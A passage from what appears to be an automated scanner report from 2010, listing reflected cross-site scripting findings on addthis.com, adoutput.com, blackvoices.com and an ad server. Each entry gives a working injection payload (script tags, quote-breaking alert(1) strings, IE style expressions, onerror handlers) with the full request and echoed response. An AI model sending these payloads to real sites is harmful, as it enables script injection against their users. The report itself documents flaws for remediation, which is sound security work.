Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6265
Content-Type: text/html
Expires: 0
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:33:21 GMT
Connection: close

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/8G8GFWIREBUW/9_1_updated_Glomo_IR/BW_728x90_IR_40k_V1.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/273499083/directdc601';a4b4776bc56;ai.180920921;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/273499083/directdc601';a4b4776bc56;ai.180920921;ct.1/01" />
...[SNIP]...

1.55. http://redcated/8GF/iview/273499083/direct/01/4353325 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4353325

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f425'%3b82df02f9b00 was submitted in the REST URL parameter 4. This input was echoed as 7f425';82df02f9b00 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct7f425'%3b82df02f9b00/01/4353325 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6265
Content-Type: text/html
Expires: 0
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:33:22 GMT
Connection: close

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/8G8GFWIREBUW/9_1_updated_Glomo_IR/BW_728x90_IR_40k_V1.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/273499083/direct7f425';82df02f9b00;ai.180920921;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/273499083/direct7f425';82df02f9b00;ai.180920921;ct.1/01" />
...[SNIP]...

1.56. http://redcated/8GF/iview/273499083/direct/01/4367731 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4367731

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7b7'%3b91d72ce6d9c was submitted in the REST URL parameter 4. This input was echoed as 4f7b7';91d72ce6d9c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct4f7b7'%3b91d72ce6d9c/01/4367731 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6282
Content-Type: text/html
Expires: 0
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:33:21 GMT
Connection: close

<html><head><title>BW_728x90_PR_TradeshowBanner</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
<param name="movie" value="HTTP://ec.atdmt.com/ds/8G8GFWIREBUW/BW_PR_Tradeshow_Banner/BW_728x90_PR_40k_V1.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/273499083/direct4f7b7';91d72ce6d9c;ai.189412363;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/273499083/direct4f7b7';91d72ce6d9c;ai.189412363;ct.1/01" />
...[SNIP]...

1.57. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22b68<script>alert(1)</script>c7dcdbaa3f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php22b68<script>alert(1)</script>c7dcdbaa3f1 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=nfcmfl3a8bvamf2epbm2sfr8v4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php22b68<script>alert(1)</script>c7dcdbaa3f1</strong>
...[SNIP]...

1.58. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5c7a"-alert(1)-"857e19dcbea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpc5c7a"-alert(1)-"857e19dcbea HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=40ctjkt2h4hdgnllgcsm2qi256; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpc5c7a"-alert(1)-"857e19dcbea";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.59. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bca3"%20style%3dx%3aexpression(alert(1))%20509484a33de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7bca3\" style=x:expression(alert(1)) 509484a33de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=ny/7bca3"%20style%3dx%3aexpression(alert(1))%20509484a33depost HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="ny/7bca3\" style=x:expression(alert(1)) 509484a33depost" />
...[SNIP]...

1.60. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c18"-alert(1)-"034c58d7f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/22c18"-alert(1)-"034c58d7f3a HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/22c18"-alert(1)-"034c58d7f3a";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.61. http://www.addthis.com/bookmark.php [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a11"%20style%3dx%3aexpression(alert(1))%20f974865e7b3 was submitted in the username parameter. This input was echoed as a7a11\" style=x:expression(alert(1)) f974865e7b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=nyposta7a11"%20style%3dx%3aexpression(alert(1))%20f974865e7b3 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="nyposta7a11\" style=x:expression(alert(1)) f974865e7b3" />
...[SNIP]...

1.62. http://www.addthis.com/bookmark.php [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764f1"style%3d"x%3aexpression(alert(1))"83f87f85126 was submitted in the v parameter. This input was echoed as 764f1"style="x:expression(alert(1))"83f87f85126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250764f1"style%3d"x%3aexpression(alert(1))"83f87f85126&username=nypost HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-250764f1"style="x:expression(alert(1))"83f87f85126" />
...[SNIP]...

1.63. http://www.addthis.com/help/api-spec [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da9a"-alert(1)-"c69f3c78fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3da9a"-alert(1)-"c69f3c78fc2/api-spec HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=9oaq5mil1k02nq110ts56omut3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1441
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/3da9a"-alert(1)-"c69f3c78fc2/api-spec";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker =
...[SNIP]...

1.64. http://www.addthis.com/help/api-spec [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 77b50<script>alert(1)</script>696b9357f98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /77b50<script>alert(1)</script>696b9357f98/api-spec HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ml9o7tc804oogtbe2d38amhjd7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1467
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>77b50<script>alert(1)</script>696b9357f98/api-spec</strong>
...[SNIP]...

1.65. http://www.addthis.com/help/api-spec [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0a3"-alert(1)-"bb1385e53e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help/6d0a3"-alert(1)-"bb1385e53e HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=89ulbati6ru761e244tt7suj63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mouser=sk; expires=Fri, 03-Dec-2010 20:24:48 GMT; path=/
Vary: Accept-Encoding
imagetoolbar: no
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 13400

   
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>AddThis - He
...[SNIP]...
<script type="text/javascript">
var u = "/404/help/6d0a3"-alert(1)-"bb1385e53e";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.66. http://www.adoutput.com/version2/hit_rm.cfm [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adoutput.com
Path:   /version2/hit_rm.cfm

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 8ec69<img%20src%3da%20onerror%3dalert(1)>5025a7d35c8 was submitted in the type parameter. This input was echoed as 8ec69<img src=a onerror=alert(1)>5025a7d35c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /version2/hit_rm.cfm?type=08ec69<img%20src%3da%20onerror%3dalert(1)>5025a7d35c8 HTTP/1.1
Host: www.adoutput.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Nov 2010 20:21:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value "08ec69<img src=a onerror=alert(1)>5025a7d35c8" cannot be converted to a number
</h1>
...[SNIP]...

1.67. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6b3b"-alert(1)-"dd17837dd5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:c6b3b"-alert(1)-"dd17837dd5a/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334838204.3408588364.1550714624; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:41 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31028
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld30 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:c6b3b"-alert(1)-"dd17837dd5a";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:c6b3b\"-alert(1)-\"dd17837dd5a/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain
...[SNIP]...

1.68. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19f54</script><script>alert(1)</script>6443d67beca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com19f54</script><script>alert(1)</script>6443d67beca/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.489352780.3698329344; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:44 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31020
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
